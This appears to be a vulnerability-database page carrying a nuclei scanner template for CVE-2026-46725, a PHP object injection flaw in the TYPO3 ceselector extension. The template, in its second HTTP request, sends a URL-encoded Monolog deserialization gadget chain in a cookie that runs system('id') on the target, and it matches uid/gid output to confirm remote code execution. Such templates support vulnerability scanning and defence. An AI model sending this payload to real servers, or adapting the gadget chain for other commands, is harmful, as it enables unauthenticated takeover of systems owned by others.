Lucene search
K

TYPO3 ceselector Extension - Insecure Deserialization

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

TYPO3 ceselector extension insecure deserialization via cookie enables remote code execution.

Related
Refs
Code
id: CVE-2026-46725

info:
  name: TYPO3 ceselector Extension - Insecure Deserialization
  author: DhiyaneshDk
  severity: critical
  description: |
    TYPO3 extension contains a PHP Object Injection caused by passing attacker-controlled cookie to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution, exploit requires Persistent Mode: Static configuration.
  impact: |
    Remote unauthenticated attackers can execute arbitrary code on the TYPO3 server, leading to full system compromise.
  remediation: |
    Update to the latest version of TYPO3 with the vulnerability fixed or apply patches that validate and sanitize unserialize input.
  reference:
    - https://typo3.org/security/advisory/typo3-ext-sa-2026-001
    - https://packagist.org/packages/mmc/ceselector
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-46725
    epss-score: 0.02306
    epss-percentile: 0.81276
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
    vendor: mmc
    product: ceselector
    framework: typo3
    shodan-query: http.component:"TYPO3 CMS"
  tags: cve,cve2026,typo3,deserialization,rce,ceselector,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "T3_ceselector_")'
        internal: true

    extractors:
      - type: regex
        name: ceselector_cookie
        part: header
        group: 1
        regex:
          - "(?i)Set-Cookie:\\s*(T3_ceselector_\\d+)="
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Connection: close
        Cookie: {{ceselector_cookie}}=O%3A28%3A%22Monolog%5CHandler%5CGroupHandler%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00handlers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A3%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A0%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22Monolog%5CLogRecord%22%3A2%3A%7Bs%3A5%3A%22level%22%3BE%3A19%3A%22Monolog%5CLevel%3ADebug%22%3Bs%3A5%3A%22mixed%22%3Bs%3A2%3A%22id%22%3B%7D%7Ds%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A3%3A%7Bi%3A0%3Bs%3A15%3A%22get_object_vars%22%3Bi%3A1%3Bs%3A3%3A%22end%22%3Bi%3A2%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("uid=\\d+\\([a-z_][a-z0-9_-]*\\)\\s+gid=\\d+\\([a-z_][a-z0-9_-]*\\)", body)'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 0
        regex:
          - "uid=\\d+\\([a-zA-Z0-9_-]+\\)\\s+gid=\\d+\\([a-zA-Z0-9_-]+\\)[^\\n]*"
# digest: 490a0046304402207855333c1896490d55ac97f0a7f66b2c75433c2f09d30a535cc801259e2e154b0220253b0e31f738c88b27049863b5b536235cb8c0194a955c51b6944191aeb096cc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2026 16:23Current
6.2Medium risk
Vulners AI Score6.2
CVSS 49.2
EPSS0.02306
SSVC
20